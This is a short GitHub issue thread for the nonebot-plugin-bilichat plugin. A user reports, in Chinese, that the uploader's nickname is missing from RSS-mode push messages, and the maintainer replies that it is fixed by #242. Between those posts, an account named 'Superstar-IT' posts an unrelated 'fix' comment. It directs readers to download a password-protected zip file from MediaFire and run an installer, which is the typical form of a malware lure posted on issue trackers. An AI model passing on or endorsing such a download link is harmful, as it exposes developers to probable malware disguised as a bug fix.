### ISSUE TITLE
Bug: RSS模式下推送消息不显示Up主昵称

### ISSUE THREAD

**Issue by ElainaFanBoy** [Well2333/nonebot-plugin-bilichat#241]
### 操作系统

Windows

### Python 版本

3.10.13

### NoneBot 版本

2.3.3

### Bilichat 版本

5.12.2

### 描述问题

使用RSS模式下推送消息不显示Up主昵称

### 截图或日志

![Image_1724822913176](https://github.com/user-attachments/assets/4e6ab3b6-97d4-4bc3-9905-262564d74478)

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Well2333** [comment]
fixed #242
